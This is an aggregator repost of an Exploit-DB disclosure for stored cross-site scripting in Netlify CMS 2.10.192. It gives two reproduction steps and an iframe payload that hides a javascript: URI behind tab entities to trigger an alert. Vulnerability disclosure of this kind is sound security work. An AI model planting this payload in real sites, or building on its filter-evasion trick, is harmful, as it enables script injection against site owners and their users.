[webapps] Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)

[webapps] Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
2023-7-11 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:6 收藏

# Exploit Title: Netlify CMS 2.10.192 - Stored Cross-Site Scripting (XSS)
# Exploit Author: tmrswrr
# Vendor Homepage: https://decapcms.org/docs/intro/
# Software Link: https://github.com/decaporg/decap-cms
# Version: 2.10.192
# Tested on: https://cms-demo.netlify.com


Description:

1. Go to new post and write body field your payload:

https://cms-demo.netlify.com/#/collections/posts

Payload = <iframe src=java&Tab;sc&Tab;ript:al&Tab;ert()></iframe>

2. After save it XSS payload will executed and see alert box

文章来源: https://www.exploit-db.com/exploits/51576
如有侵权请联系:admin#unsafe.sh